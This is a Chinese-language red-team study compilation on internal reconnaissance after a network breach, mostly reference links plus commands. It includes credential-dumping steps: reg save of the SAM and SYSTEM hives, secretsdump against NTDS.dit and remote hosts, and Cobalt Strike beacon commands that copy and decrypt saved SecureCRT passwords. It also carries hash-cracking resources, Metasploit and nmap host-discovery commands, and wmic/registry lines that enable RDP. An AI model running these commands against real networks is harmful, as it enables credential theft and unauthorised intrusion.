红队攻防学习之内部信息收集

五、内部信息收集

1、本地信息搜集

1.1、用普通权限的域帐户获得域环境中所有DNS解析记录

参考文章:

https://beta.4hou.com/web/17955.html  --原文
https://nosec.org/home/detail/2527.html

1.2、令牌Token和会话Session原理与攻略

https://www.cnblogs.com/huangsheng/p/10736796.html

1.3、内存转储-获取本地hash

参考文章:

http://www.secwk.com/2019/09/08/6372/

1.4、转储域账户哈希值

https://scarletf.github.io/2019/09/03/域渗透-导出域用户Hash方法/
https://xz.aliyun.com/t/2527   ---如何Dump域内的Hash
https://cloud.tencent.com/developer/article/1165439   --导出域内用户hash的几种方法

这几种方法,结合下思想
然后书中的两个续集思路…


1.5、SPN发现与利用

https://sec.thief.one/article_content?a_id=594539e5b195b5fc38051bf7fb438524   --详细文章
https://rcoil.me/2019/06/【域渗透】SPN%20扫描利用/
https://www.freebuf.com/articles/system/174229.html   --老文章  SPN服务主体名称发现详解

想要继续了解的可以查看这两篇文章,巩固下


1.6哈希传递攻击利用

参考文献:

http://saucer-man.com/information_security/443.html#cl-11
https://saucer-man.com/information_security/79.html#cl-13
https://www.freebuf.com/articles/system/217681.html
https://blog.csdn.net/qq_36119192/article/details/104802921
https://www.cnblogs.com/Mikasa-Ackerman/p/hou-shen-tou-zhong-de-mi-ma-zhua-qu.html

2、用户习惯

2.1 从目标文件中做信息搜集第一季

ExifTool可读写及处理图像、视频及音频,例如Exif、IPTC、XMP、JFIF、GeoTIFF、ICC Profile。包括许多相机的制造商信息读取,如佳能,卡西欧,大疆,FLIR,三星等
exiftool -lang zh-cn -a -u -g1 ./sample.php.png

在大型内网渗透中,尤其是针对办公机的渗透,需要熟知目标集体或者个人的作息时间,工作时间,文档时间,咖啡时间,或者需要从某些文件中获取对方的真实拍摄地坐标等。那么无疑需要快速的从大量文件中筛选信息诉求。当目标越复杂,文件中的信息搜集就更为重要。如文档作者,技术文章作者,财务文档作者等,熟知在大量人员,获取对方职务,大大减少渗透过程中的无用性,重复性,可见性。与暴露性。而作为公司,应该熟悉相关文档的内置属性,尤其是在共享文件服务器上,删除或者复写敏感信息来降低企业安全风险。

本篇意旨企业安全在处理本公司相关敏感文件以及重要文件应做好更多的防范,尤其是重要部门,如研发,财务等。


2.2、获取当前系统所有用户的谷歌浏览器密码

参考文章:


2.3、adsutil.vbs 获取密码

http://www.5dmail.net/html/2007-5-9/20075901045.htm
https://www.cnblogs.com/94YY/archive/2011/05/28/2060887.html

这很老的知识点,当做一种思路吧…


2.4、解密目标机器保存的rdp凭证

https://www.jianshu.com/p/6c11412947e5    --mimikatz获取
https://www.4hou.com/posts/yJ4z    ---lsass获取
https://www.cnblogs.com/0xdd/p/11394566.html

这个方法很简单,看看就记住了…


2.5、Hashcat 神器详解

https://xz.aliyun.com/t/4008   --详细
https://blog.csdn.net/smli_ng/article/details/106111493

这里遇到了就来查…

字典集合分享

https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm 
https://weakpass.com/download 
http://ophcrack.sourceforge.net/tables.php 
https:/github.com/fuzzdb-project/fuzzdb 
https://wiki.skullsecurity.org/passwords#Password_dictionaries

战略支援部近期会对网络上的字典进行下载整理汇总,形成较完整的字典表…拿走

其他暴力破解软件

Aircrack-ng-WIFI破解工具 
John The Ripper--功能强大的破解工具包 
Medusa--在线破解工具 
Ophcrack--LM-Hash破解神器 
THC Hydra--在线破解工具 
WFUZZ--WebFuzz神器

在线解Hash网站

https://www.cmd5.com/ 
https://crackstation.net/
https://www.onlinehashcrack.com/ 
tps:/www.objectif-securite.ch/ophcrack.php 
https://hce.iteknical.com/

2.6、解密Winscp和SecureCRT客户端中保存的密码hash

Winscp

到时候补充吧

SecureCRT

前言

SecureCRT是运维人员常用的管理工具。但由于某些运维人员的安全意识不高,平时很可能会把SSH的连接密码都保存在里面,这就给了渗透人员可乘之机,为后续跨平台横向移动做了准备。而我们的主要目的是为了解密保存在SecureCRT中的这些SHH连接密码,并通过这种方式实现Windows到Linux之间的快速横向渗透。

所有操作全部在管理员权限下进行,解密脚本仅限于 SecureCRT 7.x 以下版本,高版本需要使用结尾处的方法。如果SecureCRT有启动密码,Config加密了,就不要搞了
确定目标SecureCRT的详细版本

想办法确定SecureCRT的详细版本,通过powershell脚本搞定,或者直接RDP登录连接查询等 「绿色版无安装记录」。发现目标所用的详细版本为 7.1.1(build 264)

beacon> powershell-import /Users/anonysec/ListInstalledPrograms.ps1
beacon> powershell Get-list

确定SecureCRT配置文件目录下的Sessions目录

默认情况下,SecureCRT的Config目录路径为:%APPDATA%\VanDyke\Config\Sessions\

如果无法确定路径,可以通过图形界面在SecureCRT菜单的全局选项中来确认
Sessions目录下的每个ini文件都会以连接的IP或域名来命名

beacon>shell dir %APPDATA%\VanDyke\Config\Sessions\

拷贝下载Sessions目录的ini文件

直接到Sessions目录下载ini文件可能会有问题(应该程序占用),即使下载下来,到本地可能无法解密。所以,先用Invoke-NinjaCopy.ps1脚本把ini文件先copy到其他目录,然后再去下载。

beacon> powershell-import /Users/anonysec/Invoke-NinjaCopy.ps1
beacon> powershell Invoke-NinjaCopy -Path "C:\Users\r00t\AppData\Roaming\VanDyke\Config\Sessions\192.168.144.128.ini" -LocalDestination "c:\windows\temp\192.168.144.128.ini"
beacon> shell dir c:\windows\temp\192.168.144.128.ini 
beacon> download c:\windows\temp\192.168.144.128.ini

脚本解密Session

将下载的ini文件拷贝到本地,利用脚本进行解密。环境:python 2.7、pycrypto库。此处解密脚本仅限于 SecureCRT 7.x 以下的版本!

sudo pip2 install pycrypto
python SecureCRT-decryptpass.py 192.168.144.128.ini

SecureCRT高版本解决

如果目标的SecureCRT版本较高,无法进行解密该怎么办?此处以 8.5.3(X64 build 1867)为例,直接把对应%APPDATA%\VanDyke\Config\ 整个目录拷贝到本机SecureCRT的Config目录下,然后直接连接。

目标SecureCRT版本与本地版本需一致,否则可能会出现问题

附上脚本

Winscp:
ListInstalledPrograms.ps1

winscppwa.exe –目前无法连接

SecureCRT:
ListInstalledPrograms.ps1

Invoke-NinjaCopy.ps1

SecureCRT-decryptpass.py


2.7、破解Weblogic配置文件中的数据库密码

https://www.freebuf.com/articles/web/220147.html  --这篇集合了很多思路和方法

树上介绍了使用工具WebLogicPWV1.0.jar进行破解

这里如果进行config.xml获得hash破解密码,需要去两次密码…


2.8、获取域控/系统日志

dumpel

1、windows系统日志的存储:

windows的系统日志存储在C:\WINDOWS\system32\config目录,文件后缀为evt。

2、导出工具:

使用dumpel.exe可以导出windows的系统日志。

dumpel.exe可以去微软官网下载,地址:http://support.microsoft.com/kb/927229。

下载后的dumpel.exe是个安装文件,安装完后可以在安装目录找到一个dumpel.exe,我们需要的是安装后的dumpel.exe。

3、导出脚本:

直接使用dumpel.exe不容易实现自动定期导出系统日志。所以需要编写个脚本。脚本内容:

//获得YYYYMMDD格式的当前时间
function getCurYYYYMMDD()
{
	var today = new Date();
	var year = today.getYear();
	var month = today.getMonth() + 1;
	if (month < 10) {
		month = "0" + month;
	}
	var date = today.getDay();
	if (date < 10)
	{
		date = "0" + date;
	}
	return year + "" + month + "" + date;
}
//补齐目录结尾的'\'
function makeDir(str)
{
	if (str.charAt(str.length - 1) != '\\')
	{
		return str + "\\";
	}
	else
	{
		return str;
	}
}
 
//处理命令行参数
var args = WScript.Arguments;
var days = 1;
var path = "";
var exepath = "";
for (i = 0; i < args.length; i++)
{
	var a = args(i);
	if (a.indexOf("-e") == 0)
	{
		exepath = a.substring(2, a.length);
	}
	if (a.indexOf("-p") == 0)
	{
		path = a.substring(2, a.length);
	}
	if (a.indexOf("-d") == 0)
	{
		days = a.substring(2, a.length);
	}
}
 
//补齐目录结尾的'\'
exepath = makeDir(exepath);
path = makeDir(path);
 
//获取当前时间
var YYYYMMDD = getCurYYYYMMDD();
var YYYYMM = YYYYMMDD.substring(0, 6);
 
//判断按月存放的目录是否存在
var fso = new ActiveXObject("Scripting.FileSystemObject");
if (fso.FolderExists(path + YYYYMM) != true)
{
	fso.CreateFolder(path + YYYYMM);
}
 
//执行程序,导出日志
var ws = new ActiveXObject("WScript.shell");
ws.run(exepath + "dumpel.exe /l" + " application" + " /f " + path + YYYYMM + "\\" + YYYYMMDD + "_app.xls /d " + days, 0, true);
ws.run(exepath + "dumpel.exe /l" + " security" + " /f " + path + YYYYMM + "\\" + YYYYMMDD + "_sec.xls /d " + days, 0, true);
ws.run(exepath + "dumpel.exe /l" + " system" + " /f " + path + YYYYMM + "\\" + YYYYMMDD + "_sys.xls /d " + days, 0, true);
4、执行命令:

cscript bak_win_log.js -eD:\Desktop -pD:\winlog -d7

使用windows的任务计划执行该命令就实现了定期导出。

dumpel的安装目录里的dumpel_d.htm是使用说明


wevtutil

直接上看微软详情吧:

https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/wevtutil

psloglist

https://www.cnblogs.com/-zhong/p/11743489.html
https://wenku.baidu.com/view/c2e9139803d8ce2f006623ff.html?from=search   --最详细的解释

3、网络信息收集

3.1、发现目标WEB程序敏感目录

就一目录扫描工具,可以使用其他代替。
参考文章:

https://micro8.gitbook.io/micro8/contents-1/21-30/29-fa-xian-mu-biao-web-cheng-xu-min-gan-mu-lu-di-yi-ji


3.2、基于SCF做目标内网信息搜集

https://www.lshack.cn/642/
https://gitlab.com/Tomotoes/Micro8/-/blob/b7c284fdbb53ff8ee60acff92d5ebbf1559dfd92/第一百零一课:基于SCF做目标内网信息搜集第二季.pdf

感谢Micro8大佬退役最后给出的文章思路…


3.3、内网漏洞快速检测技巧

https://xz.aliyun.com/t/2354   --good
https://www.anquanke.com/post/id/199012

3.4 域环境信息搜集

3.4.1、Active Directory Domain Services - 获取域控信息

参考文章:https://payloads.online/archivers/2019-04-12/1 感谢倾旋


3.4.2、Windows域渗透-用户密码枚举

参考文章:https://payloads.online/archivers/2018-05-02/1 感谢倾旋


3.4.3、不同环境下域dns记录信息收集方法

书上介绍了DNS信息查询方法:

DNS Manager
Dnscmd
使用 Powershell进行dns信息查询
adidnsdump
SharpAdidnsdump

五种方法来获取不通环境下域dns信息,这里后期科补~~~


3.4.4、impacket框架之域信息获取

本篇文章讲述impacket套件内部分常用域、内网信息收集工具使用,将会用到的工具,secretsdump、lookupsid、 esentutl、ticketer

Secretsdump

Secretsdump常用于本地、远程hash导出,具体使用方法如下:

在渗透测试工作中,为了躲避杀软等防护产品,dump目标机hash通常会进行以下操作。

C:\> reg.exe save hklm\sam c:\sam.save
C:\> reg.exe save hklm\security c:\security.save 
C:\> reg.exe save hklm\system c:\system.save

以上三个注册表项解释:

SAM存储域用户或本地用户的数据,包括域用户组名或本机用户组、用户名及密码哈希等。
Security存储用户安全策略,存储域用户、本地用户登陆记录,缓存的登陆用户凭证,例如domain cache
system用来解密SAM和Security

之后使用secretsdump进行hash内容导出,具体方法如下:

1)本地hash导出

获取SAM中hash

secretsdump.py -sam sam.save -system system.save LOCAL

获取security.save中缓存的登陆用户凭证和LSA Secres

secretsdump.py -security security.save -system system.save LOCAL

获取sam security 中所有内容

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

2)域用户hash导出

域用户hash导出还需要NTDS.dit活动目录数据库文件,具体导出方法请查看gitbook《转储域账 户哈希值》

使用以下命令导出域所有用户hash

python secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -outputfile
lol.hash
secretsdump.exe -ntds NTDS.dit -system temp_sys.hiv LOCAL-outputfile lol.hash
proxychains python secretsdump.py rootkit/administrator@192.168.x.x

3)远程导出hash

secretsdump还支持远程导岀hash,支持socks代理传输数据,需提供远程服务器管理员账号凭证,支持两种方式读取活动目录数据库,Vssadmin和DRSUAPI(Directory Replication Service API)远程目录复制协议api

导出远程机hash及缓存记录

secretsdump.exe rootkit/administrator@192.168.x.x

使用 Vssadmin复制用户数据库文件的方式进行远程hash导出

secretsdump.exe rootkit/administrator@192.168.x.x -just-dc -use-vss
Esentutl

esentutl常用于从dit文件提取域内信息的工具,具体使用命令:

esentutl.exe NTDS.dit export-table datatable >log.txt
Ticket
https://wh0ale.github.io/2018/12/25/2018-12-25-域渗透之票据/
lookupsid.py

可查看远程目标机器或域控所有用户内容(需提供域任意用户凭证)

lookupsid在读取远程机器用户信息时,同时会输出域SID,域SID是生成黄金票据所需数据。

lookupsid.py domain/user:password@ip

3.4.5、域信息收集之user2sid,sid2user

使用场景:当前内网环境有域环境,使用nbtscan或者nltest获取到域控的IP,但是没有域用户的账号密码

作用:使用 sid2user 和 user2sid 枚举猜测出域用户名,并通过弱口令获取域用户的权限
下载地址:

http://greatagain.dbappsecurity.com.cn/#/publicarea/tooldisk?path=412/2430

目前无法访问!

使用

user2sid.exe \\域控IP 域用户名

域里面域管默认为administrator用户,且sid为500

那么先通过administrator域管获取域用户的sid

user2sid.exe \\192.168.x.x administrator

得到域用户的sd为S-1-5-21-675002476-827761xxxx…
总结文章:

freebuf.com/sectool/175208.html

4、工作组环境信息搜集

4.1 基于MSF发现内网存活主机

auxiliary/scanner/discovery/arp_sweep    #基于arp协议发现内网存活主机,这不能通过代理使用
auxiliary/scanner/portscan/ack           #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机

auxiliary/scanner/ftp/ftp_version        #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version        #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version  #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp            #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version      #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title             #探测内网http服务的标题
auxiliary/scanner/smb/smb_version        #发现内网smb服务,基于默认的445端口   
use auxiliary/scanner/mssql/mssql_schemadump  #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump  #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version    #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner        #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server     #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version        #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname         #探测内网主机的netbios名字

感谢Micro8大佬!!!

参考文章:

https://micro8.gitbook.io/micro8/contents-1/21-30/28-ji-yu-msf-fa-xian-nei-wang-cun-huo-zhu-ji-di-liu-ji

4.2、基于sqlDataSourceEnumerator发现内网存活主机

参考文章:

https://micro8.gitbook.io/micro8/contents-1/41-50/50-ji-yu-sqldatasourceenumerator-fa-xian-nei-wang-cun-huo-zhu-ji

感谢大佬!!Micro8


4.3、基于ICMP发现内网存活主机

ICMP简介:

它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。

nmap扫描:

$ sudo nmap -sP -PI 192.168.1.0/24 -T4
$ nmap -sn -PE -T4 192.168.1.0/24

CMD下扫描:

for /L %%P in (1,1,254) do @ping -w 10 -n 1 192.168.1.%%P | findstr TTL

powershell扫描:

powershell.exe ‐exec bypass ‐Command "Import‐Module ./Invoke‐TSPingSweep.ps1
; Invoke‐TSPingSweep ‐StartAddress 192.168.1.1 ‐EndAddress 192.168.1.254 ‐Resolv
eHost ‐ScanPort ‐Port 445,135"
D:\>tcping.exe ‐n 1 192.168.1.0 80

参考文章:

https://micro8.gitbook.io/micro8/contents-1/21-30/21-ji-yu-icmp-fa-xian-nei-wang-cun-huo-zhu-ji

4.4、基于UDP发现内网存活主机

UDP简介:

UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后,是无法得知其是否安全完整到达的。

UDP显著特性:

1)UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。

2)UDP 数据报是有长度的。每个 UDP 数据报都有长度,如果一个数据报正确地到达目的地,那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议,没有任何(协议上的)记录边界。

3)UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报

4)UDP 支持多播和广播。

1、nmap扫描

$ nmap -sU -T5 -sV --max-retries 1 192.168.1.100 -p 500

2、msf扫描

msf > use auxiliary/scanner/discovery/udp_probe
msf > use auxiliary/scanner/discovery/udp_sweep

3、unicornscan扫描

linux下使用推荐

$ unicornscan -mU 192.168.1.100

项目地址:

https://www.mcafee.com/ca/downloads/free-tools/scanline.aspx

蓝奏地址:

https://www.lanzous.com/i32zncf

win下使用推荐。管理员执行

附录:
在线基于Nmap的udp扫描:

https://pentest-tools.com/network-vulnerability-scanning/udp-port-scanner-online-nmap

参考文章:

https://micro8.gitbook.io/micro8/contents-1/11-20/12-ji-yu-udp-fa-xian-nei-wang-cun-huo-zhu-ji

4.5、基于ARP发现内网存活主机

ARP简介:

ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址

1、nmap扫描

$ nmap -sn -PR 192.168.1.1/24

2、msf扫描

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target address range or CIDR identifier
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads
TIMEOUT 5 yes The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(arp_sweep) > set THREADS 10

3、netdiscover

$ netdiscover -r 192.168.1.0/24 -i wlan0

4、arp-scan(linux)
(推荐)速度与快捷 项目地址:

https://linux.die.net/man/1/arp-scan

arp-scan没有内置kali,需要下载安装

apt-get install arp-scan

5、Powershell

c:\tmp>powershell.exe -exec bypass -Command "Import-Module .\arpscan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"

6、arp scannet
项目地址:

https://sourceforge.net/projects/arpscannet/files/arpscannet/arpscannet 0.4/

7、arp-scan(windows)

(推荐)速度与快捷

arp-scan.exe -t 192.168.1.1/24

项目地址:

https://github.com/QbsuranAlang/arp-scan-windows-/tree/master/arp-scan (非官方)

8、arp-ping.exe

arp-ping.exe 192.168.1.100

9、其他

如cain的arp发现,一些开源py,pl脚本等,不一一介绍。

参考文章:

https://micro8.gitbook.io/micro8/contents-1/11-20/13-ji-yu-arp-fa-xian-nei-wang-cun-huo-zhu-ji#5-powershell

4.6、基于snmp发现内网存活主机

SNMP简介:

SNMP是一种简单网络管理协议,它属于TCP/IP五层协议中的应用层协议,用于网络管理的协议。SNMP主要用于网络设备的管理。SNMP协议主要由两大部分构成:SNMP管理站和SNMP代理。SNMP管理站是一个中心节点,负责收集维护各个SNMP元素的信息,并对这些信息进行处理,最后反馈给网络管理员;而SNMP代理是运行在各个被管理的网络节点之上,负责统计该节点的各项信息,并且负责与SNMP管理站交互,接收并执行管理站的命令,上传各种本地的网络信息。

nmap扫描:

$ nmap -sU --script snmp-brute 192.168.1.0/24 -T4

msf扫描:

msf > use auxiliary/scanner/snmp/snmp_enum

项目地址:

https://www.mcafee.com/us/downloads/free-tools/snscan.aspx

依然是一块macafee出品的攻击

NetCrunch:

项目地址:

https://www.adremsoft.com/demo/

内网安全审计工具,包含了DNS审计,ping扫描,端口,网络服务等
snmp for pl扫描:

项目地址:

https://github.com/dheiland-r7/snmp

附录:

use auxiliary/scanner/snmp/aix_version use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/arris_dg950
use auxiliary/scanner/snmp/snmp_enum_hp_laserjet
use auxiliary/scanner/snmp/brocade_enumhash use auxiliary/scanner/snmp/snmp_enumshares 
use auxiliary/scanner/snmp/cambium_snmp_loot use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_config_tftp use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/cisco_upload_file use auxiliary/scanner/snmp/snmp_set
use auxiliary/scanner/snmp/netopia_enum
use auxiliary/scanner/snmp/ubee_ddw3611 
use auxiliary/scanner/snmp/sbg6580_enum
use auxiliary/scanner/snmp/xerox_workcentre_enumusers

其他内网安全审计工具(snmp):
项目地址:https://www.solarwinds.com/topics/snmp-scanner
项目地址:https://www.netscantools.com/nstpro_snmp.html

参考文章:

https://micro8.gitbook.io/micro8/contents-1/11-20/20-ji-yu-snmp-fa-xian-nei-wang-cun-huo-zhu-ji

4.7、基于netbios发现內网存活主机

netbios简介:

IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以使用的应用程序编程接口(API),为程序提供了请求低级服务的同一的命令集,作用是为了给局域网提供网络以及其他特殊功能。

系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名-——特指基于NETBIOS协议获得计算机名称——解析为相应IP地址,实现信息通讯,所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的共享

nmap扫描:

$ nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4

msf扫描:

msf > use auxiliary/scanner/netbios/nbname

nbtscan扫描:

项目地址:

http://www.unixwiz.net/tools/nbtscan.html

Windows:

D:\>nbtscan-1.0.35.exe -m 192.168.1.0/24

Linux:(推荐)

$ tar -zxvf ./nbtscan-source-1.0.35.tgz(1.5.1版本在附录)
$ make 
$ nbtscan -r 192.168.1.0/24
$ nbtscan -v -s: 192.168.1.0/24

NetBScanner:

项目地址:

https://www.nirsoft.net/utils/netbios_scanner.html

附录:
nbtscan:

NBTscan version 1.5.1. Copyright (C) 1999-2003 Alla Bezroutchko. This is a free software and it comes with absolutely no warranty. You can use,distribute and modify it under terms of GNU GPL.

Usage:
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename)|(<scan_range>)
    -v verbose output. Print all names receivedfrom each host
    -d dump packets. Print whole packet contents.
    -e Format output in /etc/hosts format.
    -l Format output in lmhosts format.Cannot be used with -v, -s or -h options.
    -t timeout wait timeout milliseconds for response.Default 1000.
    -b bandwidth Output throttling. Slow down output so that it uses no more that bandwidth bps. Useful on slow links, so that ougoing queries don't get dropped.
    -r use local port 137 for scans. Win95 boxes respond to this only.You need to be root to use this option on Unix.
    -q Suppress banners and error messages,
    -s separator Script-friendly output. Don't print column and record headers, separate fields with separator.
    -h Print human-readable names for services. Can only be used with -v option.
    -m retransmits Number of retransmits. Default 0.
    -f filename Take IP addresses to scan from file filename.
    -f - makes nbtscan take IP addresses from stdin.
    <scan_range> what to scan. Can either be single IP 
        like 192.168.1.1 or
        range of addresses in one of two forms:
        xxx.xxx.xxx.xxx/xx or xxx.xxx.xxx.xxx-xxx.

Examples:
    nbtscan -r 192.168.1.0/24
        Scans the whole C-class network.
    nbtscan 192.168.1.25-137
        Scans a range from 192.168.1.25 to 192.168.1.137
    nbtscan -v -s : 192.168.1.0/24
        Scans C-class network. Prints results in script-friendly
        format using colon as field separator.  
        Produces output like that:
        192.168.0.1:NT_SERVER:00U
        192.168.0.1:MY_DOMAIN:00G
        192.168.0.1:ADMINISTRATOR:03U
        192.168.0.2:OTHER_BOX:00U
        ...
    nbtscan -f iplist
        Scans IP addresses specified in file iplist.

NBTscan version 1.5.1:

项目地址:

https://github.com/scallywag/nbtscan

4.8、内网信息收集之内网代理

查询代理配置情况

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

查询并开启远程连接服务
查看远程连接端口

Reg query "hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\RDP-Tcp" /v portnumber

在Windows Server 2003中开启3389端口

wmic path win32_terminalservicesetting where (__CLASS !="")  call setallowtsconnections 1

在Windows Server 2008和Windows Server 2012中开启3389端口

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1

reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f